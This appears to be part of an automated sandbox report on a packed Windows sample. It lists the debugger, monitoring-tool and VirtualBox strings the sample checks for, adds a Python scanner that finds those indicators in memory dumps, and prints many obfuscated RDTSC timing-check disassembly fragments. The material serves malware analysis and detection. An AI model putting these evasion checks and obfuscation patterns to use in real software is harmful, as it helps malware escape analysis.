Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
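The window-class searches under "Boot Survival" (FilemonClass, RegmonClass, PROCMON_WINDOW_CLASS), the registry opens for Software\Wine and HARDWARE\ACPI\DSDT\VBOX__, and the process names and VirtualBox paths in the memory-dump strings above are all the same kind of evidence: literal indicator strings the sample compares against its environment. The scanner below is an added example, not part of the report, for triaging a memory dump or unpacked image for that indicator set. It searches each string in both ASCII and UTF-16LE, because wide-character APIs such as FindWindowW and RegOpenKeyExW read UTF-16 and an ASCII-only strings pass misses them, and it folds case so that PROCMON.EXE and Procmon.exe both count. The indicator list is taken from the report lines above; the category labels and the constructed sample dump are assumptions of this example.

```python
# Indicator strings the sample carries, as seen in the window searches, registry opens and
# memory-dump strings listed above, grouped by what each one is used to detect.
INDICATORS = {
    "analysis-tool window class": ["FilemonClass", "RegmonClass", "PROCMON_WINDOW_CLASS"],
    "analysis-tool process name": ["procmon.exe", "x64dbg.exe", "windbg.exe", "wireshark.exe", "ida.exe"],
    "VM / sandbox registry key": [
        r"Software\Wine",
        r"HARDWARE\ACPI\DSDT\VBOX__",
        r"SYSTEM\ControlSet001\Services\VBoxSF",
    ],
    "VM driver file": [r"VBOX*.DLL"],
}


def find_all(haystack: bytes, needle: bytes):
    """Yield every offset of needle in haystack (overlapping matches included)."""
    pos = haystack.find(needle)
    while pos != -1:
        yield pos
        pos = haystack.find(needle, pos + 1)


def scan_indicators(blob: bytes):
    """Case-insensitive search for each indicator in both ASCII and UTF-16LE.
    bytes.lower() folds only ASCII letters, so the UTF-16 NUL bytes survive untouched."""
    low = blob.lower()
    hits = []
    for category, names in INDICATORS.items():
        for name in names:
            for encoding, needle in (("ascii", name.encode("ascii")),
                                     ("utf-16le", name.encode("utf-16-le"))):
                for off in find_all(low, needle.lower()):
                    hits.append({"offset": off, "category": category,
                                 "indicator": name, "encoding": encoding})
    return sorted(hits, key=lambda h: h["offset"])


def summarize(hits):
    """Category -> sorted list of distinct indicators seen."""
    seen = {}
    for h in hits:
        seen.setdefault(h["category"], set()).add(h["indicator"])
    return {c: sorted(v) for c, v in seen.items()}


# Constructed stand-in for a process memory dump. Wide-character Windows APIs take UTF-16
# strings, so some indicators are stored that way and never show up in an ASCII strings pass.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"PROCMON.EXE\x00X64DBG.EXE\x00WINDBG.EXE\x00"
    + "PROCMON_WINDOW_CLASS".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
    + "HARDWARE\\ACPI\\DSDT\\VBOX__".encode("utf-16-le") + b"\x00\x00"
    + b"Software\\Wine\x00"
    + b"c:\\tools\\Procmon.exe\x00"        # mixed case: still a hit
    + b"nothing to see here\x00"
)

if __name__ == "__main__":
    for h in scan_indicators(SAMPLE_DUMP):
        print(f"{h['offset']:#08x} {h['encoding']:8s} {h['category']:28s} {h['indicator']}")
    print(summarize(scan_indicators(SAMPLE_DUMP)))
```

Feed it the .sdmp files Joe Sandbox exports (`scan_indicators(open(path, "rb").read())`) rather than the packed file on disk: as the entropy figure above shows, these strings only exist after the packer has unpacked the payload in memory. The same table doubles as a renaming checklist for an analysis VM: the process names, window classes and VirtualBox artifacts it lists are exactly what needs to be hidden before this sample will run its payload.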
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: DA0105 second address: DA0109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: DA0109 second address: DA010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B771 second address: F1B791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D6h 0x00000007 jnc 00007F577C5415C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B8FA second address: F1B8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B8FE second address: F1B90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1BA77 second address: F1BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1BA7D second address: F1BA87 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F577C5415C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E1EC second address: F1E1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E1F0 second address: F1E242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F577C5415CFh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F577C5415D5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E242 second address: F1E248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E248 second address: F1E263 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e ja 00007F577C5415C6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E263 second address: F1E2FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+12A028B3h] 0x0000000e push 00000003h 0x00000010 mov ecx, dword ptr [ebp+12A02B87h] 0x00000016 push 00000000h 0x00000018 xor dword ptr [ebp+12A03714h], ecx 0x0000001e push 00000003h 0x00000020 push 87071A14h 0x00000025 jmp 00007F577C53EFD0h 0x0000002a add dword ptr [esp], 38F8E5ECh 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F577C53EFC8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b add edx, dword ptr [ebp+12A02BFBh] 0x00000051 lea ebx, dword ptr [ebp+12B820A3h] 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F577C53EFC8h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 mov edi, dword ptr [ebp+12A017D8h] 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push esi 0x0000007b push eax 0x0000007c pop eax 0x0000007d pop esi 0x0000007e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E2FA second address: F1E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E300 second address: F1E304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E429 second address: F1E42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E42D second address: F1E437 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E437 second address: F1E43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E584 second address: F1E5C9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F577C53EFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 571D6AE2h 0x00000013 jmp 00007F577C53EFD1h 0x00000018 push 00000003h 0x0000001a mov di, D96Ch 0x0000001e push 00000000h 0x00000020 movzx edi, ax 0x00000023 push 00000003h 0x00000025 cmc 0x00000026 mov cx, DFD7h 0x0000002a push 979B830Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jnc 00007F577C53EFC6h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E5C9 second address: F1E5CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3170E second address: F31712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0CEA9 second address: F0CEC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F577C5415C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D75B second address: F3D75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D75F second address: F3D768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D768 second address: F3D772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D919 second address: F3D91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DA90 second address: F3DAAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F577C53EFE8h 0x0000000f pushad 0x00000010 jng 00007F577C53EFC6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DAAF second address: F3DABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DC52 second address: F3DC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F577C53EFD7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E1C0 second address: F3E1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E1C6 second address: F3E1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E60B second address: F3E613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E613 second address: F3E61C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E7A5 second address: F3E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E7B1 second address: F3E7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F36720 second address: F36725 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E908 second address: F3E912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3EEBB second address: F3EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3EEC5 second address: F3EED8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F577C53EFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F05B second address: F3F067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F067 second address: F3F06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F388 second address: F3F3A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F577C5415C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0CEA3 second address: F0CEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F437AA second address: F437B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F438C7 second address: F438DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F16D85 second address: F16DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D8h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49E48 second address: F49E5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 js 00007F577C53EFCEh 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49F9C second address: F49FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49FA0 second address: F49FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4A0E3 second address: F4A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F11F22 second address: F11F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4A6B7 second address: F4A6BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C947 second address: F4C94D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C94D second address: F4C95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C95C second address: F4C960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D093 second address: F4D099 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D195 second address: F4D19F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D19F second address: F4D1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D1A3 second address: F4D1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D35A second address: F4D364 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D364 second address: F4D37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D56D second address: F4D577 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C5415CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D75B second address: F4D765 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D765 second address: F4D777 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F577C5415C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D777 second address: F4D77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4DCC0 second address: F4DCCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E601 second address: F4E605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E605 second address: F4E6A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F577C5415D5h 0x0000000d jmp 00007F577C5415CFh 0x00000012 nop 0x00000013 call 00007F577C5415CFh 0x00000018 jnp 00007F577C5415C8h 0x0000001e pop esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F577C5415C8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b cld 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F577C5415C8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov di, 3A44h 0x0000005c xchg eax, ebx 0x0000005d jnc 00007F577C5415D8h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E6A7 second address: F4E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C53EFC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E6B2 second address: F4E6B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4F7C6 second address: F4F7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F52E28 second address: F52E42 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C5415CCh 0x00000008 jns 00007F577C5415C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jc 00007F577C5415CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F51687 second address: F5168B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5168B second address: F516A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
